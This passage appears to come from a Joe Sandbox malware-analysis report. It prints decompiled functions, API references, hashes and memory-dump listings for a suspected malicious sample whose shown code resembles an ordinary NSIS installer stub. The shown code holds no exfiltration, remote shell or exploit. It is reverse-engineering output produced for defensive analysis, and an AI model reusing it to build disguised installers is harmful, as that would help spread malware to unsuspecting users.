Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040332B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403339
0x0040333f

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404239 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404239(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d244, _a4); // executed
				return _t2;
			}

0x00404243
0x00404249

APIs

KiUserCallbackDispatcher.NTDLL(?,00404010), ref: 00404243

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052E6(0xffffffeb, _t7); // executed
				_t9 = E00405867(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E0040670D(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061C9( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
Opcode Fuzzy Hash: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ac2
0x00402ace

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
Opcode Fuzzy Hash: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404C62(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x434f28;
				_t282 = 0;
				_v24 =  *0x434ef4 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x434efd & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404BB0(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x434efc) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42d22c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42d240;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42d22c = _t282;
								 *0x42d240 = _t282;
								 *0x434f60 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x434efd & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C30();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42d240;
									_t195 =  *0x434f28;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x434f2c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t282) {
											E00404B6B(0x3ff, 0xfffffffb, E00404B83(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x434f2c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42d240);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x434f60 = _t306;
					 *0x42d240 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t252 = LoadBitmapW( *0x434ee0, 0x6e);
					 *0x42d234 =  *0x42d234 | 0xffffffff;
					_t313 = _t252;
					 *0x42d23c = SetWindowLongW(_v8, 0xfffffffc, E0040525A);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d22c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d22c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A4(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404217(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404217(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x42d240 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x42d240 + _t316 * 4) = _t276;
									_t284 =  *( *0x42d240 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x434f2c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040424C(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040424C(_v12);
								L91:
								return E0040427E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c71
0x00404c82
0x00404c87
0x00404c8f
0x00404c95
0x00404c9d
0x00404cab
0x00404cae
0x00404ecf
0x00404ed6
0x00404eea
0x00404ed8
0x00404eda
0x00404edd
0x00404ede
0x00404ee5
0x00404ee5
0x00404ef6
0x00404f04
0x00404f07
0x00404f1d
0x00404f92
0x00404f95
0x00404f97
0x00404fa1
0x00404faf
0x00404faf
0x00404fb1
0x00404fbb
0x00404fc1
0x00404fc4
0x00404fc7
0x00404fe2
0x00404fc9
0x00404fd3
0x00404fd3
0x00404fc7
0x00404fbb
0x00000000
0x00404f95
0x00404f22
0x00404f2d
0x00404f32
0x00404f39
0x00404f3e
0x00404f42
0x00404f4d
0x00404f4d
0x00404f51
0x00404f55
0x00404f59
0x00404f6c
0x00404f5b
0x00404f5b
0x00404f62
0x00404f68
0x00404f64
0x00404f64
0x00404f64
0x00404f62
0x00404f70
0x00404f72
0x00404f85
0x00404f88
0x00404f8b
0x00404f8b
0x00404f55
0x00000000
0x00404f42
0x00404f24
0x00404f2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fe5
0x00404fe5
0x00404fec
0x0040505d
0x00405065
0x0040506d
0x0040506d
0x00405076
0x00405078
0x0040507f
0x00405082
0x00405082
0x00405088
0x0040508f
0x00405092
0x00405092
0x00405098
0x0040509e
0x004050a4
0x004050a4
0x004050b1
0x00405207
0x0040520e
0x0040522b
0x00405231
0x00405243
0x00405243
0x00000000
0x004050b7
0x004050b9
0x004050be
0x004050c3
0x004050c8
0x004050ca
0x004050ca
0x004050cb
0x004050cc
0x004050ce
0x004050ce
0x004050d6
0x00405117
0x00405119
0x00405129
0x0040512c
0x00405131
0x00405138
0x0040513b
0x004051dd
0x004051e3
0x004051f1
0x00405202
0x00405202
0x00000000
0x004051f1
0x00405141
0x00405144
0x0040514a
0x0040514f
0x00405151
0x00405153
0x00405159
0x00405160
0x00405165
0x0040516c
0x0040516f
0x0040516f
0x00405176
0x00405182
0x00405186
0x00405188
0x00405188
0x00405178
0x0040517a
0x0040517a
0x004051a8
0x004051b4
0x004051c3
0x004051c3
0x004051c5
0x004051c8
0x004051d1
0x00000000
0x004050d8
0x004050e3
0x004050e6
0x004050eb
0x004050ed
0x004050f1
0x00405101
0x0040510b
0x0040510d
0x00405110
0x00000000
0x00000000
0x00000000
0x00000000
0x004050f3
0x004050f3
0x004050f9
0x004050fb
0x004050fb
0x004050fc
0x004050fd
0x00000000
0x004050f3
0x004050d6
0x004050b1
0x00404ff4
0x00000000
0x0040500a
0x00405014
0x00405019
0x00000000
0x00000000
0x0040502b
0x00405030
0x0040503c
0x0040503c
0x0040503e
0x0040504d
0x0040504f
0x00405053
0x00405056
0x00000000
0x00405056
0x00404ff4
0x00404cb4
0x00404cb9
0x00404cc2
0x00404cc9
0x00404cd7
0x00404ce2
0x00404ce8
0x00404cf6
0x00404d0a
0x00404d0f
0x00404d1c
0x00404d21
0x00404d37
0x00404d48
0x00404d55
0x00404d55
0x00404d58
0x00404d5e
0x00404d60
0x00404d63
0x00404d68
0x00404d6d
0x00404d6f
0x00404d6f
0x00404d8f
0x00404d8f
0x00404d91
0x00404d92
0x00404d97
0x00404d9a
0x00404d9d
0x00404da1
0x00404da6
0x00404dab
0x00404daf
0x00404db4
0x00404db9
0x00404dbb
0x00404dc3
0x00404e8e
0x00404ea1
0x00000000
0x00404dc9
0x00404dcc
0x00404dcf
0x00404dd2
0x00404dd2
0x00404dd9
0x00404ddf
0x00404de2
0x00404de8
0x00404de9
0x00404dee
0x00404df7
0x00404dfe
0x00404e01
0x00404e04
0x00404e07
0x00404e43
0x00404e6c
0x00404e45
0x00404e52
0x00404e52
0x00404e09
0x00404e0c
0x00404e1b
0x00404e25
0x00404e2d
0x00404e34
0x00404e3c
0x00404e3c
0x00404e07
0x00404e72
0x00404e73
0x00404e7f
0x00404e7f
0x00404e8c
0x00404ea7
0x00404eab
0x00404ec8
0x00404ecd
0x00000000
0x00404ead
0x00404eb2
0x00404ebb
0x00405245
0x00405257
0x00405257
0x00404eab
0x00000000
0x00404e8c
0x00404dc3

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C7A
GetDlgItem.USER32(?,00000408), ref: 00404C85
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
LoadBitmapW.USER32(0000006E), ref: 00404CE2
SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
